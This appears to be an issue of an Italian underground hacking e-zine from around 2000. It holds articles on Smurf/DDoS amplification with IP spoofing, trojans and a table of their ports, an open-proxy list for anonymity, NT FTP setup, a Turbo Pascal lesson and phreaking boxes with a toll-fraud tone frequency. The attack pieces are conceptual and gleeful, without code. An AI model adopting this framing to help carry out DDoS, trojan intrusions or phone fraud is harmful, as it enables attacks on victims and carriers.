non preoccupatevi... anch'io comincio a non capire più quello che dico :o0
per chiarirci le idee un'IP Broadcast Address, ve l'ho già spiegato, è
"
l'indirizzo che identifica tutti i dispositivi di una determinta rete";
il Broadcast Ping, invece, è un PING inviato all'IP Broadcast; se a questo
punto non sapete neanche cos'è un PING... ve lo spiego io =) è, detto in
parole povere, la domanda "
Sei attivo?" da noi inviata, in questo caso, a
tutti i dispositivi del network. Ora che ci siamo chiariti le idee
(o almeno spero) procediamo:
Ma perchè abbiamo dovuto "
pingare" l'IP
Broadcast, qual'è l'utilità di quest'azione, apparentemente, senza senso?
Be, è semplice noi abbiamo posto una domanda ad un'intera rete e questa ci
risponderà, o risponderà alla nostra vittima... eh eh ;o)
Vediamo di spiegarci meglio, magari con un disegnino, così voi imparate
cos'è un attacco Smurf ed io imparo a disegnare :o)

Esempio (l'idea di questo esempio l'ho presa da una rivista cartacea della
quale non ricordo il nome, pardon... comunque è un'esempio semplice ed
efficace quindi vale la pena copiarlo ;o):

Allora, mettiamola così, noi siamo l'agressore (A) e vogliamo colpire la
nostra vittima, che in questo caso è C. Invece di spedire dei ping
direttamente a C dalla nostra linea a 56K, usiamo l'IP broadcast address
della rete B, composta da 1000 computer con una linea da 1 Mb.Per ogni ping
da noi inviato attraverso la nostra linea a 56 K, C riceverà 1000 ping su
una linea da 1 Mb (!!!). Se usiamo più reti amplificatrici contemporaneamente
(Distributed Denial Of Service) genereremo un flusso di dati spaventoso in
grado di abbattere chiunque! :o<MuAhAhAHAH)

B
,___________________________,
¤ ___ ____ _____ ____ ¤
¤ | | | | | ¤
¤ |___| |__ | |-- ¤
¤ |\ | | | ¤
¤ | \ |____ | |____ ¤
^'~~~~~~~~~~~~|^|~~~~~~~~~~~~'^
|§|
,~~~~~~~~~,
|¤¤¤¤¤¤¤¤¤|
|¤ROUTER!¤|
|¤¤¤¤¤¤¤¤¤|
'_________'
.
/ \
|
A | B
_______ | _______
| | . \ / . | |
| | |\ ' |\ | |
| | ............| > INTERNET->...........| > | |
_|_______|_ |/ |/ _|_______|_
| :o) | ' ' | ;o( |
| Agressore | | VITTIMA |
|___________| |___________|


Bene, da quanto potete vedere dal "
fantastico" disegno qui sopra io non ho
imparato a disegnare :o( ma spero che voi abbiate capito cos'è uno smurf
attack :o)

Ora non vi rimane che stampare questo articolo e pulirvicicci =) la bava che
vi sta colando sul monitor! :o) Su, riprendetevi, non è ancora finita,
infatti se lasciamo tutto com'è quel miGliaio di ping vi ritornerebbe
indietro e vi travolgerebbe, e questa si che sarebbe "
una botta nei denti"...
Quindi, andiamo avanti!
Noi abbiamo formulato una domanda, e a noi arriverà la risposta, giusto? No!
perchè noi dirotteremo la risposta sulla nostra vittima usando lo spoofing!
Cos'è lo spoofing!? Ma mi tocca spiegarvi tutto... vabbè, tanto non ho niente
da fare... allora, l'IP spoofing è semplicemente il cammuffamento del nostro
indirizzo IP, noi in questo caso faremo credere che il nostro IP sia quello
della vittima; come si fa? Be, io sono qui per parlare di D.o.S., non di
spoofing, vi consiglio di cercare qualcosa al riguardo su siti lame... emh,
volevo dire hacker ;) tipo www.alexmessomalex.com o, se siete persone "
serie"
:o) vi scaricate il mio bel cookbook: http//cookbooker.supereva.it ;o)),
comunque credo che nel prossimo numero (se non mi avranno già scacciato...;)
scriverò qualcosa sullo spoofing, sempre che non trovi qualcosa di più
interessante...


Utility per il D.D.o.S. (Distributed Denial of Service, ossia un attacco
combinato di più D.o.S.) sono:
Trinoo,
Tribe Flood Network (TFN),
Stacheldraht (ossia "
filo spinato").

OK raga, la lezione è finita: andate in pace! O:o)§
Alla proX! mandi mandi!

Be, è ora di andare... ~'~

~'~ |^| ~'~
~'~ .___|ª|__, ~'~ !
._____________|~¤_by_¤~|______________, ~'~ ¤
|¤|',_,-'\_|the_C00kB00k3R|_/'-,_,'|¤/ \o/ ~'~
~"
~"~"|___________________________________/~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~|Byez!>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
,_________________________________________________________________________,
|Saluti e ringraziamenti: saluto Shademanone, Ulisses1, Rhost, TomCat, |
|NightNavigator e tutti i newbies; ;o) THX! |
| |
|Un fuck di tutto cuore a: la scuola che sta per ricominciare :(articolo |
|scritto il 2/3 Settembre), quel coglione di LuKa (non quello grande e |
|grosso ma quello piccolo e magro:), ai fanatici che non sono fanatici di |
|computer, ai lamerD e a questa tastiera del caXXo .!. |
'-------------------------------------------------------------------------'
Se siete rimaste affascinate dalla mia persona... Cookbooker@libero.it
Se siete rimastI affascinatI dalla mia persona... www.afanculo.org ;o)
Ok, ok la smetto di fare il deficente... se volete scrivermi per chiarire
qualche argomento, per "aggiornarmi" o per donarmi le vostre scorte di
LoHacker per l'inverno, scrivetemi: cookbooker@libero.it
look the my hacker site: www.cookbooker.com ;o)

,^-,_,:'~^\,^,/^~':,__,:'~^\,_,/^~':,__,:'~^\,_,/^~':,__,:'~^\,^,/^~':,_,-^,
---------------------------------------------------------------------------



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


|¤³>################################################################<³¤|
|¤³<#############################TROJAN#############################<³¤|
|¤³>################################################################<³¤|


<<<<<<<<<<<fabripal>>>>>>>>>>>

I Trojan

Quale metodo piu' efficace, se non quello di attaccare il nostro nemico dal posto in cui pensa di essere piu' al sicuro?
La funzione del troian e' proprio quella che svolse ai tempi dell' antica grecia il cavallo di troia, che una volta introdotto
nella citta' nemica fece uscire dalla propria pancia i soldati che dettero alle fiamme la citta'.
Il trojan e' un programma, illegale in quanto viola la privacy, composto da un client e da un server, il server, una volta configurato viene introdotto nel pc
della vittima spesso associato ad una foto oppure ad un altro programma. Una volta che si verra' lanciato questo programma
il server si installa sul pc predisponendolo ad una invasione da chiunque possieda il suo client e la sua password.
Le funzioni svolte dai trojan sono le piu' svariate, infatti potremo scaricare file dal pc della vittima, modificare le sue impostazioni di
windows, cancellare file, eseguire programmi , scaricare file, aprire il cd-room etc.
Naturalmente queste funzioni vengono controllate dal nostro client che dovra' essere installato sul nostro pc.
Parametro esssenziale per il funzionamento dei trojans e' la conoscenza dell' indirizzo IP della vittima.
Questo e' possibile determinarlo attraverso vari modi, uno dei piu' semplici e' avere una chat come Icq o Mirc, da queste infatti
attraverso programmi chiamati Sniffer risalgono all' Ip.
L' indirizzo Ip pero' non e' sempre lo stesso ogni volta che la vittima si collega alla rete, infatti e' composto da piu' campi fissi
ed anche da alcune variabili ad es. 212.216.xxx.xxx e' l'indirizzo di chi utilizza la connessione a Tin. I campi . xxx.xxx
sono le variabili; per determinare queste se non si possiede Icq si puo' usare uno scanner nel quale si introdurranno i campi
fissi ed il numero della porta che il server utilizza. Cosi' otterremo l'elenco di coloro che hanno il server installato su quel
numero di porta.
I trojans sono anche chiamati RAt's ( Remote Administration tools ) e sono tantissimi, i piu' comuni sono Net Bus, Subseven,
Back Orifice...
Naturalmente esistono anche programmi in grado di individuare i trojans sul pc e di cancellarli come il Bo detect, Tds etc.
Di imminente debutto e' la versione di subseven 2.2; Inutile e' dire che l'utilizzo di trojan produce la violazione della privacy
che , in italia e' punita con pene fino a 3 anni di carcere. Come rimuovere un server dal nostro pc?
I trojan si attivano ogni volta che windows viene avviato. Il sospetto di essere stati infettati dal fatto che il pc si blocchi in
uscita, cerchi di connettersi automaticamente come e' capitato al sottoscritto; in questi casi e' necessario verificare durante
una connessione, quali porte siano aperte ed il nome dell' applicazione che le usa. In genere un server trojan non ha nome
ed il suo stato e' in listening. Da qui la certezza della sua presenza. Per eliminarlo ci sono vari metodi tra cui il piu' semplice e' quello
di utilizzare un trojan detector, altrimenti si puo operare sul file che avvia automaticamente alcuni programmi ogni volta che si avvia windows, cioe'
win.ini.


Le porte usate dai trojan piu' comuni sono::


___________________________________________________
Porta n.|Protocollo|Nome del trojan
---------------------------------------------------
2 TCP Death 1.0
21 TCP Blade 0.80 Alpha
21 FTP Invisible ftp
23 TCP Tiny Telnet Server, truva atl 1.2
23 tcp Tiny truva atl 1.2, butt man 0.9n
25 tcp Antigen, kuang2, taprias, win32, agent31, hackers paradise, masters
31 tcp paradise
58 tcp dmsetup
59 tcp dmsetup
79 tcp firehotcker
80 tcp executor, connector, shadowphyre2.12.54
146 tcp the infector 1.3
420 tcp breach 4.5 beta, ini-killer, phase zero 1.0-1.1
555 tcp stealth spy, net admistrator 1.0
666 tcp noknok 6.0 attack ftp
667 tcp snipernet 2.1
777 tcp uundetected
1001 tcp le guardien 1.01, webex 1.4
1020 tcp vampire 1.2
1212 tcp kaos 1.1 1.3
1234 telnet ultor's telnet trojan
1243 tcp subseven 1.0 1.8
1349 udp back orife dll
1492 ftp ftp 99cmp
1981 telnet shockrave
1987 telnet system33trojan 1.1, Backdoor, trasmission scout 1.1-1.2
2000 tcp trasmission scout 1.1-1.2
2001 tcp trojan cow 1.0
2023 tcp ripper pro
2115 tcp bugs
2140 udp the invasor
2255 udp the nirvana trojan
2565 tcp striker 1.0
2801 tcp phineas phucker
3250 udp the invasor
3456 tcp the terror trojan , doly trojan 2.0
4201 tcp war 2.0
4321 tcp bo-bo 1.0 final beta
4567 tcp file nail 1
5000 tcp bubbel, blazer 5, control du sockets
5001 tcp one of the last trojan
5031 tcp net metropolitan 1.00-1.04
5400 tcp blade runner 080.alpha
5401 " "
5402 " "
5569 tcp robo hack 1.2
5882 udp y3k 1.0
5888 udp "
6000 tcp the thing
6661 tcp teman
6669 tcp host control 1.0
6712 tcp funny trojan
6767 tcp nt remote control 2000
6912 tcp shitheepnet controler
7000 tcp remote grab 1.0
7789 tcp icq killer
9400 tcp incommand 1.0-1.4
9999 tcp forced entry1.1, the prayer 1.5
10085 tcp syphillis 1.18
10101 tcp brainspy beta
10607 tcp coma 1.0.9
10666 udp ambush 1.0
11223 tcp secret agent 1.0
12223 tcp hack 99 keylogger
12345 tcp netbus 1.20-.170
12349 tcp bionet
13010 tcp hacker brasil 1.0
13013 tcp psychward
14500 tcp pcinvader
15303 tcp krippled 1.0
16484 tcp mosucker 1.0
16969 tcp priority beta
17166 tcp Mosaic 2.0
17449 tcp kid terror 1.0
19017 tcp schwindler trojan 1.82
20001 tcp millennium 1.0-2.0
20034 tcp netbus 2.0 beta-netbus 2.10
21544 tcp girl friend 1.0 beta- 1.35
21544 tcp exploiter 1.0 beta
23005 tcp net trash 1.0 beta
23032 tcp amanda 2.0
23432 tcp asylum
23456 ftp evil ftp
27374 tcp subseven
29891 udp the unexplained
30003 udp lamers death
30100 tcp netsphere 1.27a
30101 "
"
30102 "
"
31337 UDP back orifice 1.20, 2000-freak trojan 2000
31338 tcp deep bo
31339 tcp dk32 netspy
31788 tcp hack'a'tack 2.1
32418 tcp acid battery
33333 tcp blakharaz 1.0
34324 tcp bigluck
37651 tcp yat
40412 tcp the spy beta 1
44444 tcp prosiak
44675 tcp exploiter
47262 tcp delta source 0.5-0.7
50766 tcp fore 1.0 beta
51966 tcp cafeini 0.8
53001 tcp remote explorer
54321 tcp school bus, net spider
55555 tcp prosiak
65000 tcp devil 1.3
65535 tcp rc

<<<<<<<<<<<//////////fabripal>>>>>>>>>>>>



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


|¤³>################################################################<³¤|
|¤³<##########################LISTA PROXY###########################<³¤|
|¤³>################################################################<³¤|


Autore: Rhost

N.D. Cookbooker: Il nostro caro Rhost, colpito da una crisi creativa, ha deciso di darci una
lista di proxy, che sono sempre utili. Per chi non lo sapesse i proxy, detto in poche parole,
non sono altro che una "
barriera" che ci protegge dagli attacchi dei soliti lamer (e non),
infatti, se venire attaccati, non sarete voi a "
cadere" ma il proxy; il proxy inoltre serve
per avere una certa anonimità: sarà l'IP del proxy a "
firmare" le vostre "varie azioni" ;) in
rete, e non il vostro.


Lista proxy:

207.163.2.22:80
205.167.0.11:80
24.151.8.220:80
192.102.232.18:80
209.20.188.198:80
192.138.40.91:80
209.31.91.130:80
24.216.110.15:80
family.idirect.com:81
206.66.64.13:80
204.183.91.5:80
204.196.123.2:80
209.114.176.34:80
12.4.146.8:80
dns.pc-room.co.jp:80
207.34.202.2:80
webcache1.th.red.net:80
193.229.255.17:80
194.76.49.46:80
12.6.40.2:80
132.79.7.10:80
195.242.79.6:80
195.200.163.250:80
cr277137-a.nmkt1.on.wave.home.com:8080
148.228.13.3:80
207.179.71.20:80
195.120.113.182:80
209.197.132.29:80
proxy.pacificcoast.net:3128
210.154.48.188:80
38.154.120.252:80
208.169.102.230:80
12.10.160.2:80
203.97.44.10:80
12.13.21.130:80
208.8.111.250:80
155.247.166.25:8080
216.101.47.178:80
64.19.3.2:80
207.108.136.35:80
206.132.131.182:80
216.100.84.58:80
204.116.62.49:80
209.212.184.42:80
207.211.58.248:80
194.73.108.50:80
sanyo.sanyocir.co.jp:8080
210.124.228.2:80
206.128.192.142:80
200.34.197.2:80
195.112.45.10:80
24.113.82.96:80
proxy.jwu.edu:80
156.46.128.166:80
194.190.209.164:8080
12.21.1.66:80
12.24.218.4:80

,-----,
|RH05T|
'-----'



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


|¤³>################################################################<³¤|
|¤³<#################Utilizzare i server Ftp....####################<³¤|
|¤³>################################################################<³¤|


Autore: Rhost

UTILIZZARE I SERVIZI DEL SERVER FTP (WIN/NT) Premessa: Se non fosse per l'insistenza del mio amico CookBooker, non avrei mai scritto nulla, ma poi ki lo sentiva? :) Con i suoi conti alla rovescia, per ricordarmi la scadenza del tempo a disposizione per consegnare il lavoro, già ke voleva un articolo sui Proxy ed io ne ho fatto un altro, mi tokka sentirlo anke per questo :) Cominciamo: Una delle applicazioni + utilizzate nell'ambiente TCP/IP è il protocollo per il trasferimento dei file (FTP). In NT è presente un client di FTP, con questo possiamo trasferire file dalla nostra makkina ad altre makkine presenti sulla rete. A differenza di altri Winzoz 95/98 su NT possiamo trovare anke un server di FTP, in modo ke anke le altre makkine sulla rete possono fare il trasferimento di file sulla nostra.... :\ mmmm... va bè ke noi entriamo nelle altre makkine, ma fare entrare gli altri sulla nostra? :[ SIKUREZZA LEGATA ALL'FTP :) Uno dei problemi nell'utilizzo di FTP è ke le password attraversano la rete non codificate, mettendo a riskio la nostra sikurezza. Vi consiglio quindi di pensarci 25 volte prima di trasformare il vostro piccì in un server FTP. Il sistema di sikurezza del server FTP è integrato con quello di WIN NT. Questo significa ke i client utilizzano gli account e le pass degli utenti di Winzoz NT per fare login sul server FTP attraverso TCP/IP. Cioè ki si connetterà al ns server utilizzerà user name e pass ke sono configurati nel nostro sistema, anke l'accesso ai file ed alle directory viene gestito sempre dal sistema di protezione NT. Un consiglio ke da la Microzoz è quello di installare il server sempre in una partizione NTFS, in modo ke dir e file presenti nel server siano sikuri, ma oggi è possibile leggere le partizioni NTFS anke con sistemi 95/98... :) Se ankora pensate sia una buona cosa creare un server in casa, passiamo alla procedura di installazione, se pensate ke la vostra sikurezza sia a riskio potete anke smettere di leggere adesso... :-& INSTALLARE IL SERVER FTP Allora: 1) Selezionate l'icona rete dal pannello di controllo 2) Nella finestra di dialogo Impostazioni di rete, fate click sul pulsante Aggiungi Software. Apparirà una finestra di dialogo Aggiungi software di rete. (spero) :] 3) Selezionate la voce Protocollo TCP/IP ed i relativi componenti dall'elenko per visualizzare le opzioni della finestra di dialogo "
Opzioni installazione TCP/IP per Winzoz NT. 4) Selezionate l'opzione Servizio server FTP e fate click su OK. Il vekkio Bill ha fatto in modo ke appaia un msg sui problemi di sicurezza, se ne siete ankora convinti fate click su SI e tutti i componenti verranno installati, se non siete convinti, perkè avevte letto fino a qui? CONFIGURARE IL SERVER FTP (SERVIZI) Dopo aver installato tutto si aprirà una finestra per configurare il nostro server, da qui possiamo configurare elementi tipo: il massimo numero di utenti ke kontemporaneamente possono accedere al ns server (se ne mettete 20 sono già troppi), il periodo di "timeout" cioè quanto tempo può stare uno a guardare i vostri filez senza fare nulla, ed in + possiamo decidere a quale directory dovrà accedere ogni client ke si connette. Altra cosa ke possiamo configurare attraverso questa finestra sono le connessioni anonime, cioè ki si connette al nostro server, può fare il login presentandosi come utente Anonimo (Anonymous), di solito un utente anonimo corrisponde all'utente "Guest" di Winzoz NT, ma possiamo cambiare la configurazione di default a nostro piacimento, concedendo o eliminando diritti, a patto però ke inseriamo il nome dell'account nella lista crando un prototipo di utente, altrimenti se avessimo un utente Anonimo ke fa un login nel nostro server, avrà sempre i diritti di "Guest", questo non è specificato nella configurazione, ma ve lo dico per esperienza... :( Possiamo anke configurare il server in modo ke accetti solo Anonimi. Sembrerà strano, ma questo kredo sia il modo + sicuro di configurare il server, perkè così le unike pass non codificate ke passano attraverso il filo saranno quelle di utenti anonimi e non le vostre.. :\ Una volta inserito tutto potete fare OK sulla finestra e kiuderla. Nel pannello di controllo avremo una nuova icona relativa alla gestione del server, clikkandoci sopra si aprirà la "Sessione utente FTP", da qui è possibile vedere, nomi utente, indirizzo IP e tempo di connessione per ogni utente, se invece sono anonimi, potete vedere anke la pass ke hanno usato per fare il login. (se accedete su un server FTP non vostro come anonimi non mettete mai una pass ke abbia a ke fare con voi). Da questa finestra volendo :)) se clikkate sul pulsante "Disconnetti tutti" .... mmm..mika mi ricordo cosa fa.. provate voi :) Sempre su questa finestra potete clikkare su "Protezione" vi apparirà la finestra di dialogo "Protezione del Server FTP", da questa possiamo configurare l'accesso in scrittura ed in lettura alle diverse partizioni del nostro sistema, quindi per aumentare la sicurezza sarebbe meglio mettere tutti i filez sensibili in una sezione e poi neghiamo l'accesso in lettura e scrittura, oppure se volessimo ke sul nostro server sia possibile solo il prelievo e non l'upload dei files, dobbiamo selezionare la casella consenti lettura e non quello in scrittura. Fine. Forse vi aspettavate un argomento riguardante l'hack? Quindi ho sbagliato tutto? Ma se sapete come si protegge un server, non è + semplice trovare i punti deboli? mah... Per i commenti a favore rhost@post.com per quelli a sfavore cookbooker@libero.it :)

N.D. Cookbooker: non intasatemi il servizio e-mail, eheheheh


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³
0
ooo ooo oo oooo oooo o o, ,o o, ,o o o o ooooo
o o o o o o o o o o o o o o o o o o o o oo o o
ooo ooo o o o oo oooo ooooo o o o o o o o o o o o ooo
o oo o o o o o o o o o o o o o o oo o o
o o o oo oooo o o o o o o o o o o o ooooo
³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


|¤³>################################################################<³¤|
|¤³<##########################TURBO PASCAL##########################<³¤|
|¤³>################################################################<³¤|


Autore:............EvilAngel (UMC)
Consumo:...........Bolletta, tempo...
Musica:............Ho la SoundBlaster rotta...NO COMMENT!

DiscLAMER

cari amici vi saluto
leggete tutto sto mappone
io non sembro pippo o pluto
e non so manco ricchione

ma vi auguro una buona lettura
spero che vi appassionate
fatevi una grande cultura
o vi concio come patate

se volete altri testi
chiamate l'angelo del male
e verrete accontentati

ma se poi fuggite lesti
sembrando un animale
voi verrete fucilati

CHE SIGNIFICA? E' UN SONETTO
Schema delle rime: ABAB CDCD EFG EFG ;)

Disclamer
che ce la metto a ffà nà disclamer per un linguaggio di programmazione? BAH!

------------------TURBO PASCAL,LEZIONE1---------------------------
------------------VARIABILI E COSTANTI----------------------------

Se vi avvicinate per la prima volta ad un linguaggio i programmazione, vi sarete chiesti
sicuramente cosa significa "variabile e "costante".

Un incognita che può assumere qualsiasi valore è una variabile.

Un incognita che ha un valore fisso (numero, lettera, parola, ecc.) è una costante.


In turbo pascal, le variabili possono essere di tipi diversi. I tipi più comuni tra i
programmatori sono:

-INTEGER: le variabili di tipo integer comprendono tutti i numeri dell'insieme degli INTERI,
ovvero numeri dal -???? al ????, razionali (non radicali) e interi (non decimali, non frazioni).

-REAL: le variabili di tipo real, invece, sono i numeri REALI, ovvero numeri dal -????? al ?????,

di qualsiasi tipo.

-CHAR:le variabili di tipo char sono formate da un CARATTERE, ovvero una lettera, un numero,
insomma un solo carattere.

-STRING:le variabili di tipo string corrispondono alle nostre PAROLE, insomma un insieme di
char, che possono essere di misura infinita.

-BOOLERIAN: queste variabili sono di tipo BOOLERIANO, in parole povere possono assumere i valori

1 (true, vero) o 0 (false, falso).

----------------------STRUTTURA DI UN PROGRAMMA-------------------------

Passiamo alla fase pratica: come è costituito un programma.
Un programma molto banale potrebbe essere questo:

Uses CRT;
begin
clrscr;
writeln('Buongiorno mondo!');
repeat until keypressed;
end.

Proviamo ad analizzare ogni singola linea.
-Uses crt;
questo comando fa capire al nostro compilatore che abbiamo intenzione di utilizzare le
funzioni CRT, ovvero caratteri, lettere e calcoli con essi.
Come è evidente, alla fine di questo comando, come accade molto spesso, viene utilizzato il
simbolo di "
punto e virgola"(;), che, nel linguaggio pascal, significa che la riga di istruzioni
finisce lì

-begin
questo comando non viene seguito dal punto e virgola, e simbolizza l'inizio del programma
vero e proprio. La fine di esso, come vedremo, sarà contrassegnata dal comando END.

-clrscr;
questo comando pulisce lo schermo da precedenti righe di programma.

-writeln('Buongiorno mondo!');
questo comando scrive sul video ciò che è tra gli apici, infatti sul monitor apparità la scritta

Ciao mondo!

-repeat until keypressed;
questo comando, che analizzeremo dettagliatamente più avanti, serve semplicemente per
attendere la digitazione di un tasto. Senza di esso, il programma si eseguirebbe e finirebbe
in maniera tanto veloce che l'occhio umano non apprezzerebbe l'output

-end.
questo è l'unico comando seguito da un punto, e segnala la fine del programma.

Un programma può essere anche formato da PROCEDURE, ovvero blocchi di programmi che eseguono
istruzioni particolari, i quali possono essere richiamati nel programma proncipale più volte,
senza dover riscrivere più volte il codice. Il loro uso è

Procedure UMC;
begin
.
.
.
end;
begin
.
.
.
UMC;
end.

possiamo notare delle cose:
-alla chiusura della procedura, il comando END è seguito da un punto e virgola
-nel corso del programma principale la procedura è richiamata come un programma
-prima di dichiarare una procedura del programma principale, dobbiamo prima scrivere le
operazioni in essa contenute.

------------------------------FINE PRIMA LEZIONE-----------------------
NOTA

  
DELL'AUTORE
Ehy, ma in questo articolo manca qualcosa...ma certo! I SALUTI!!!
innanzitutto vorrei salutare Cookbooker, il fondatore dell'UMC, UomoHipHop, in nostro writer, e
tutti quelli dell'UMC, dato che sono nuovo e non li conosco ankora tutti! La nostra è una crew
in espansione!!
P.s. UMC non significa Unione Maniaci del Computer, ma bensì Underground Magazine Crew ;)

SALUTI & BACI
EVILANGEL


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~0~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~ oooo o o oooo ooooo ooo o o o o ~ o oooo~~~~~~~~~~~~~~~~~
~~~~~~~ o o o o o o o o o o o ~ o oo o o ~~~~~~~~~~~~~~~~
~~~~~~~ oooo ooooo oooo oooo ooooo oo ~~ o o o o o oo~~~~~~~~~~~~~~~~
~~~~~~~ o ~ o o o o ~ o ~ o o o o ~ o o oo o o~~~~~~~~~~~~~~~~
~~~~~~~ o ~~~ o o o o ooooo o ~ o o o o o o oooo~~~~~~~~~~~~~~~~~
³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


|¤³>################################################################<³¤|
|¤³<#####################Introduzione al PHREAKING##################<³¤|
|¤³>################################################################<³¤|


a cura di ~GoNe PoSt@L~


Con questa guida a puntate,vorrei approfittare dell' occasione offertami da Cookbooker per
introdurvi all' "arte" del Phreaking. Per chi non lo sapesse, il Phreaking si occupa di tutto
ciò che è inerente alla telefonia, quindi da come frodare "mamma Telecom" a come intercettare
telefonate col vostro E-TACS ( ma chi è che ha ancora i TACS? :-) ) o col vostro cordless, e
moltissimo altro. In poche parole il Phreaking si può definire come un Hacking telefonico ( e
le due "arti" non sono poi così distanti, anzi...).

Storia del Phreaking ( una piccola parte... )
In Italia, il Phreaking ha avuto il suo periodo di maggior splendore nei primi anni '90, quando
"mamma Telecom" non era ancora corsa ai ripari per difendersi dai Phreakers. A quei tempi, c' era
l' imbarazzo della scelta per quanto riguarda le tecniche di Phreaking ed era anche il periodo delle
famose "box", di cui parleremo in seguito. Oggi, invece, cercare di fregare la Telecom è diventato
molto più difficile e l' unico spiraglio sembra essere quello dei numeri verdi ( che qui chiameremo
"green"), oppure dobbiamo sperare che con la liberalizzazione del settore delle telecomunicazioni
qualcosa si muova a favore dei Phreaker. Comunque ancora ci sono delle tecniche valide per continuare
l' arte del Phreaking che illustrerò man mano sui vari numeri dell' e-zine. Forse in qualche prossimo
numero vi racconterò la situazione che si andò a creare al tempo del VideoTel e del C64. Un po'
complessa e forse noiosa, ma comunque interessante... E poi se si vuole diventare Phreaker bisogna
sapere cosa ci si è persi (sniff :-°°°( .

Mamma, mamma, cos' è una "box" ?
Dovete sapere che molte delle tecniche che venivano usate in Italia nei primi anni '90 venivamo
dall' estero e così molte box, che però spesso finivano per essere inutili, o quasi, con le nostre
inee telefoniche. Le box, erano dei semplici insiemi di circuiti e componenti elettronici che
cercavano di ingannare le centraline della Telecom (nel nostro caso). Ognuna venne rappresentata
con un colore, per distinguerle una dall' altra, dato che utilizzavano tecniche diverse e in
America se ne contarono circa una ventina.

Blue box
Il blue box naque da una scoperta casuale di un tecnico di
trasmissioni radio il cui nome e' John Draper.
Egli aveva notato che attraverso un fischietto trovato in una scatola di
cereali era possibile fare chiamate senza pagare niente.
Ok molti di voi possono pensare che egli si sia fatto una canna e poi,
preso dalle allucinazioni, si sia messo a fischiare sulla cornetta,
in realta' lo pensavo anch'io, ma non e' cosi'.
Infatti egli si era accorto che quel fischietto emulava una frequenza di
2600hz che guarda caso era proprio quella che in gergo telefonico viene
chiamata TRUNK CODE o semplicemente TRUNK. Purtroppo questa tecnica non è più applicabile in
Italia, dato che la At&t ( a cui tutte le maggiori compagnie telefoniche fanno riferimento )
ha introdotto un sistema chiamato Electronic Switching System che filtra il trunk, non
permettendo il suo passaggio. In alcune zone dell' Italia, però, questo sistema potrebbe essere
ancora applicabile, dato che per cambiare un ' intera rete telefonica ci vuole parecchio tempo...
Se riuscite a procurarvi una Blue box ( non mi chiedete come, dato che è da un po' che non si
vedono più in giro... :-\), il Trunk Code dell' Italia è 2040/2400 Hz.

Red box
Questo tipo di box non fu mai applicabile in Italia dato che emulava il suono delle monetine,
ma essendo a qui tempi le linee ad impulsi, la cosa era impossibile da attuare qui da noi.

Black box
La black box era un semplice gruppo di componenti elettronici (talvolta un solo resistore) che
compensando la variazione di un parametro fisico della linea impediva alla centrale dell'utente
di rilevare che egli aveva appena risposto a una chiamata. In tal modo, il chiamante non riceveva
addebito per quella comunicazione.Però anche questa box ebbe poca diffusione in Italia dato che
quando venne utilizzata, le nostre linee telefoniche già erano state corrette da questo bug.
Le altre box, sono poi delle combinazioni di queste box principali, e perciò non mi dilungherò
ad illustrarle.

Nel prossimo numero parlerò dei ROTOR, ovvero le simpatiche cabine telefoncihe arancioni e di
come riuscire ad espugnarle ( non sto scherzando, è veramente un impresa ) per avere accesso ai
fili o al lettore di tessere.
Alla prossima

P.S.
Ringrazio gli Spaghetti Phreakers perchè quello che so lo devo a loro e a PiGPeN per la parte
relativa alle box.



